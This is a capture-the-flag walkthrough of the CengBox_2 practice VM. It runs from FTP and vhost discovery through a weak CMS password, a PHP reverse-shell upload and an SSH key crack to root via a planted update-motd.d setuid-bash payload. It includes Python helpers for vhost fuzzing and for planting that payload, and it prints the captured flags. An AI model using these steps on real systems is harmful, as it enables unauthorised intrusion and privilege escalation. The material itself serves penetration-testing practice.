CengBox_2 VM

Information gathering

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.103

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Ports 21, 22 and 80 are open.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 192.168.1.103

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.101
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
| 256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_ 256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:A4:96:C9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The target runs Ubuntu. Let's start by checking anonymous FTP login.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 3.0.3)
Name (192.168.1.103:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||27250|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
ftp> get note.txt

Download it and read it locally.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ cat note.txt
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.

I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

Aaron

The most obvious takeaways are two names, Kevin and Aaron. Next, ceng-company.vm is a domain name, and "created a new area" may refer to a path under that domain, so map the domain to the target IP in the hosts file. The other point is the default password, which will probably be needed later.

Directory brute-force

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo dirsearch -u http://192.168.1.103/

[11:08:21] 200 - 555B - /index.html

After switching wordlists and tools several times, still no directories turned up. Time to rethink what "created a new area for you" really means.

Subdomain brute-force

Let's try subdomains. There is no DNS for ceng-company.vm, so the candidate names are sent in the Host header to the known IP (the hosts entry added above resolves ceng-company.vm), and responses that look like the default maintenance page are filtered out.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u ceng-company.vm -H "Host:FUZZ.ceng-company.vm" --hw 76
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://ceng-company.vm/
Total requests: 5000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000024: 403 11 L 32 W 296 Ch "admin"
000002700: 400 12 L 53 W 422 Ch "m."
000002795: 400 12 L 53 W 422 Ch "ns2.cl.bellsouth.net."
000002885: 400 12 L 53 W 422 Ch "ns2.viviotech.net."
000002883: 400 12 L 53 W 422 Ch "ns1.viviotech.net."
000003050: 400 12 L 53 W 422 Ch "ns3.cl.bellsouth.net."
000004083: 400 12 L 53 W 422 Ch "quatro.oweb.com."
000004081: 400 12 L 53 W 422 Ch "ferrari.fortwayne.com."
000004082: 400 12 L 53 W 422 Ch "jordan.fortwayne.com."

Total time: 4.585479
Processed Requests: 5000
Filtered Requests: 4991
Requests/sec.: 1090.398

With admin as the subdomain prefix the response is a 403 rather than the default page, so this is probably what we are looking for. Add the subdomain-to-IP mapping to the hosts file as well.
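The Host-header fuzzing above, as an added example (not code from the original post): a small Python vhost fuzzer that sends each candidate name in the Host header to the known IP, compares every response against a baseline for a name that should not exist, and reports the ones that differ, which is the same filtering wfuzz does with --hw/--hh. Because a live CengBox is not available here, the block also starts a constructed local HTTP server that imitates the target (default page for unknown names, 403 for admin.ceng-company.vm); that server, the short wordlist and the hosts_lines() helper are assumptions for the demo.

```python
"""Virtual-host discovery by Host header (added example)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target: Apache serves the maintenance page
# for any unknown name and a 403 for the admin vhost.
DEFAULT_BODY = b"<html><body>Site Maintenance</body></html>"
FORBIDDEN_BODY = b"<html><body>403 Forbidden</body></html>"


class FakeVhostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        if host == "admin.ceng-company.vm":
            body, status = FORBIDDEN_BODY, 403
        else:
            body, status = DEFAULT_BODY, 200
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_server():
    """Start the constructed target on a random loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), FakeVhostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(ip, port, hostname, path="/"):
    """One request to ip:port with an explicit Host header.
    Returns (status, body_length), the two values wfuzz filters on."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Host": hostname})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def fuzz_vhosts(ip, port, domain, words):
    """Return {prefix: (status, length)} for every name whose response
    differs from the baseline. The baseline is a name that should not
    exist, so it shows what the default vhost returns."""
    baseline = probe(ip, port, f"nonexistent-zz9.{domain}")
    hits = {}
    for w in words:
        result = probe(ip, port, f"{w}.{domain}")
        if result != baseline:
            hits[w] = result
    return hits


def hosts_lines(ip, domain, hits):
    """Build the /etc/hosts entry for the domain and every discovered vhost."""
    names = [domain] + [f"{w}.{domain}" for w in sorted(hits)]
    return f"{ip} " + " ".join(names)


if __name__ == "__main__":
    server = start_fake_server()
    ip, port = server.server_address
    # Stand-in for subdomains-top1mil-5000.txt.
    wordlist = ["www", "admin", "mail", "dev"]
    found = fuzz_vhosts(ip, port, "ceng-company.vm", wordlist)
    print(found)
    print(hosts_lines("192.168.1.103", "ceng-company.vm", found))
    server.shutdown()
```

Against the real box you would point probe() at 192.168.1.103 port 80 and feed it the same wordlist wfuzz used; comparing the full (status, length) tuple rather than just the status also catches vhosts that answer 200 with a different page.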

Directory brute-force

Even though the web root of the admin vhost is forbidden, that doesn't stop us from brute-forcing directories under it.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -xphp,txt,html
===============================================================
[+] Url: http://admin.ceng-company.vm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/.php (Status: 403) [Size: 300]
/.html (Status: 403) [Size: 301]
/server-status (Status: 403) [Size: 309]
/gila (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]
Progress: 881756 / 882244 (99.94%)

dirsearch found nothing here either; it took gobuster with an explicit wordlist to reveal the /gila path.

Gila CMS: search for exploits using this keyword.

Some exploits did turn up, but the local file inclusion attempt failed and the remote command execution one produced no response, so it is unclear whether this instance is affected. While trying them, though, the CMS login page was found.

Guessing the user's email and weak password

Don't forget the hint in note.txt: this panel most likely still uses a default password. The CMS installation docs, however, don't specify one, so a weak password has to be guessed. Another detail is that the login name must be an email address, presumably some combination of the username and the domain.

Tried kevin@ceng-company.vm:root and kevin@ceng-company.vm:admin.

The latter logged in successfully. From here, files can be uploaded or edited directly.

I uploaded a PHP file; after upload it was placed in the assets folder.

Reverse shell

Start the listener first, then visit http://admin.ceng-company.vm/gila/assets/1.php

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.103] 45420
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
20:36:52 up 12:48, 0 users, load average: 0.00, 0.00, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:a4:96:c9 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.103/24 brd 192.168.1.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fea4:96c9/64 scope link
valid_lft forever preferred_lft forever
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cengbox:/var/www/admin/gila$ sudo -l
sudo -l
Matching Defaults entries for www-data on cengbox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on cengbox:
(swartz) NOPASSWD: /home/swartz/runphp.sh

Switching user

www-data may run /home/swartz/runphp.sh as swartz without a password. Judging by the "Interactive mode enabled" banner, the script starts an interactive PHP shell (php -a), so PHP's system() hands us a shell as swartz.

www-data@cengbox:/var/www/admin/gila$ sudo -u swartz /home/swartz/runphp.sh
sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled

No entry for terminal type "unknown";
using dumb terminal settings.
php > system("/bin/bash");
system("/bin/bash");
swartz@cengbox:/var/www/admin/gila$

swartz@cengbox:~$ ls -liah
ls -liah
total 44K
146972 drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 .
390272 drwxr-xr-x 4 root root 4.0K May 23 2020 ..
153153 -rw------- 1 swartz swartz 1 May 26 2020 .bash_history
152982 -rw-r--r-- 1 swartz swartz 220 Aug 31 2015 .bash_logout
152981 -rw-r--r-- 1 swartz swartz 3.7K Aug 31 2015 .bashrc
521119 drwx------ 2 swartz swartz 4.0K May 23 2020 .cache
153323 drwx------ 2 swartz developers 4.0K May 26 2020 .gnupg
153151 -rw------- 1 swartz developers 34 Oct 16 20:43 .php_history
152881 -rw-r--r-- 1 swartz swartz 655 May 16 2017 .profile
155694 -rw------- 1 swartz developers 1 May 26 2020 .viminfo
153171 -rwxr-xr-x 1 swartz swartz 20 May 26 2020 runphp.sh
swartz@cengbox:~$ cat .bash_history
cat .bash_history

swartz@cengbox:~$ sudo -l
sudo -l
[sudo] password for swartz:

While looking through the other users' home directories, a private key file was found.

swartz@cengbox:/home/mitnick/.ssh$ ls -alih
ls -alih
total 20K
403733 drwxr-x--- 2 mitnick developers 4.0K May 25 2020 .
414532 drwxr-x--- 6 mitnick developers 4.0K Oct 16 22:13 ..
403829 -rw-r--r-- 1 mitnick developers 397 May 25 2020 authorized_keys
407541 -rw-r--r-- 1 mitnick developers 1.8K May 25 2020 id_rsa
407548 -rw-r--r-- 1 mitnick developers 397 May 25 2020 id_rsa.pub

Private key leak

Copying and pasting it to the local machine ran into a problem: Load key "id_rsa": error in libcrypto

This was probably caused by copying straight out of the linpeas output; most likely an encoding or formatting issue. Either download the original file or cat id_rsa and copy that. Restrict the permissions (chmod 600), try key login, and it prompts for a passphrase, so crack it with john.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ ssh2john id_rsa > sshhash

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo john sshhash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
legend (id_rsa)
1g 0:00:00:00 DONE (2023-10-17 01:03) 100.0g/s 195200p/s 195200c/s 195200C/s amore..mandy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ ssh -i id_rsa mitnick@192.168.1.103
Enter passphrase for key 'id_rsa':

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

166 packages can be updated.
119 updates are security updates.

Last login: Mon Oct 16 22:03:42 2023 from 192.168.1.101
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
mitnick@cengbox:~$ ls -alih
total 48K
414532 drwxr-x--- 4 mitnick developers 4.0K May 25 2020 .
390272 drwxr-xr-x 4 root root 4.0K May 23 2020 ..
407565 -rw------- 1 mitnick mitnick 40 Oct 16 22:04 .bash_history
402634 -rw-r--r-- 1 mitnick mitnick 220 May 23 2020 .bash_logout
402595 -rw-r--r-- 1 mitnick mitnick 3.7K May 23 2020 .bashrc
414533 drwx------ 2 mitnick mitnick 4.0K May 23 2020 .cache
407529 -rw------- 1 mitnick mitnick 505 May 23 2020 .mysql_history
407543 -rw------- 1 mitnick mitnick 1 May 26 2020 .php_history
390954 -rw-r--r-- 1 mitnick mitnick 655 May 23 2020 .profile
403733 drwxr-x--- 2 mitnick developers 4.0K May 25 2020 .ssh
391963 -rw------- 1 mitnick mitnick 33 May 23 2020 user.txt
407544 -rw------- 1 mitnick mitnick 1 May 26 2020 .viminfo
mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362

A quick look at the history files turned up nothing useful.

SUID binaries, cron jobs, and the permissions on passwd and shadow also showed nothing exploitable.

MOTD privilege escalation

Run linpeas for enumeration.

Something looks exploitable. Going through common privesc techniques, MOTD privilege escalation stands out: the scripts in /etc/update-motd.d are run as root by pam_motd when a user logs in over SSH, so if one of them is writable, a command appended to it runs as root at the next login.

mitnick@cengbox:~$ echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /etc/update-motd.d/00-header

Then exit/logout and log back in over SSH.

Writing to this file didn't seem to have any effect, so try another one (cat it afterwards to confirm the line was actually written).

mitnick@cengbox:/etc/update-motd.d$ echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /etc/update-motd.d/10-help-text

After logging back in, it worked.
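As an added example (not part of the original write-up), the precondition check for the MOTD escalation above, in Python: pam_motd runs the scripts in /etc/update-motd.d through run-parts as root at login, so what to look for is a script with an execute bit that the current user can write to. The block reproduces the owner/group/other permission check that linpeas performs, stages the same payload the post appends, and shows how to confirm that the resulting /tmp/bash is a root-owned setuid binary. The fixture directory, its file modes, and the uid/gid values it is checked against are constructed for the demo.

```python
"""Find writable update-motd.d scripts and stage the payload (added example)."""
import os
import stat
import tempfile

# The same line the write-up appends to a motd script.
PAYLOAD = "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash\n"


def writable_motd_scripts(motd_dir, uid=None, gids=None):
    """Return the scripts in motd_dir that the given account could append to.

    uid/gids default to the current process; pass explicit values to reason
    about another account (e.g. from a linpeas listing). run-parts skips
    files without an execute bit, so those are ignored even if writable.
    """
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    any_exec = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    hits = []
    for name in sorted(os.listdir(motd_dir)):
        path = os.path.join(motd_dir, name)
        st = os.stat(path)
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_uid == uid:
            writable = st.st_mode & stat.S_IWUSR
        elif st.st_gid in gids:
            writable = st.st_mode & stat.S_IWGRP
        else:
            writable = st.st_mode & stat.S_IWOTH
        if writable and st.st_mode & any_exec:
            hits.append(path)
    return hits


def plant_payload(script_path, payload=PAYLOAD):
    """Append the payload and re-read the file to confirm it landed
    (the 'cat it afterwards' step from the post)."""
    with open(script_path, "a") as f:
        f.write(payload)
    with open(script_path) as f:
        return payload.strip() in f.read()


def is_setuid_root(path):
    """True if path exists, is owned by root and has the setuid bit set."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


def build_fixture(motd_dir):
    """Constructed stand-in for /etc/update-motd.d with mixed permissions."""
    modes = {
        "00-header": 0o755,     # root-style: not writable by group/other
        "10-help-text": 0o775,  # group-writable, the misconfiguration
        "50-landscape": 0o777,  # world-writable
        "99-notes.txt": 0o666,  # writable but not executable: run-parts ignores it
    }
    for name, mode in modes.items():
        path = os.path.join(motd_dir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return modes


def demo():
    """Run the checks against the fixture as an account that is not the file
    owner but is in the owning group (mitnick is in 'developers' on this box).
    uid 12345 is an arbitrary non-owner value for the demo."""
    motd_dir = tempfile.mkdtemp(prefix="update-motd.d-")
    build_fixture(motd_dir)
    group = os.stat(os.path.join(motd_dir, "10-help-text")).st_gid
    writable = writable_motd_scripts(motd_dir, uid=12345, gids={group})
    planted = plant_payload(writable[0]) if writable else False
    return {
        "writable": [os.path.basename(p) for p in writable],
        "planted": planted,
        "tmp_bash_is_root_suid": is_setuid_root(os.path.join(motd_dir, "bash")),
    }


if __name__ == "__main__":
    print(demo())
```

On the real box, call writable_motd_scripts("/etc/update-motd.d") as mitnick to see which scripts qualify before appending anything, and after the re-login check is_setuid_root("/tmp/bash") rather than eyeballing ls output.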

mitnick@cengbox:~$ ls -liha /tmp
total 4.9M
133 drwxrwxrwt 10 root root 4.0K Oct 16 22:46 .
2 drwxr-xr-x 23 root root 4.0K May 23 2020 ..
15013 -rwsr-xr-x 1 root root 1014K Oct 16 22:46 bash

mitnick@cengbox:~$ /tmp/bash -p
bash-4.3# cd /root
bash-4.3# ls -liah
total 36K
15 drwx------ 3 root root 4.0K May 26 2020 .
2 drwxr-xr-x 23 root root 4.0K May 23 2020 ..
15009 -rw------- 1 root root 0 May 26 2020 .bash_history
16 -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
16298 drwxr-xr-x 2 root root 4.0K May 23 2020 .nano
15008 -rw------- 1 root root 1 May 26 2020 .php_history
17 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
15012 -rw-r--r-- 1 root root 518 May 23 2020 root.txt
14996 -rw-r--r-- 1 root root 66 May 23 2020 .selected_editor
15011 -rw------- 1 root root 1 May 26 2020 .viminfo
bash-4.3# cat root.txt
_____ ______ ____ ___
/ ____| ____| | _ \ |__ \
| | | |__ _ __ __ _| |_) | _____ __ ) |
| | | __| | '_ \ / _` | _ < / _ \ \/ / / /
| |____| |____| | | | (_| | |_) | (_) > < / /_
\_____|______|_| |_|\__, |____/ \___/_/\_\____|
__/ |
|___/

I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_

de89782fe4e8bf2198a022ae7f50613e

Finally, the victory screenshot.

bash-4.3# whoami
root
bash-4.3# id
uid=1000(mitnick) gid=1002(developers) euid=0(root) groups=1002(developers),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
bash-4.3# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:a4:96:c9 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.103/24 brd 192.168.1.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fea4:96c9/64 scope link
valid_lft forever preferred_lft forever
3: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
link/ether 4e:77:e0:ff:98:b7 brd ff:ff:ff:ff:ff:ff
inet6 fe80::4c77:e0ff:feff:98b7/64 scope link
valid_lft forever preferred_lft forever
inet6 fe80::1/64 scope link
valid_lft forever preferred_lft forever
bash-4.3# uname -a
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

CengBox_2 VM
https://i3eg1nner.github.io/2023/10/be5fd2fbc403.html
Author
I3eg1nner
Published
17 October 2023
License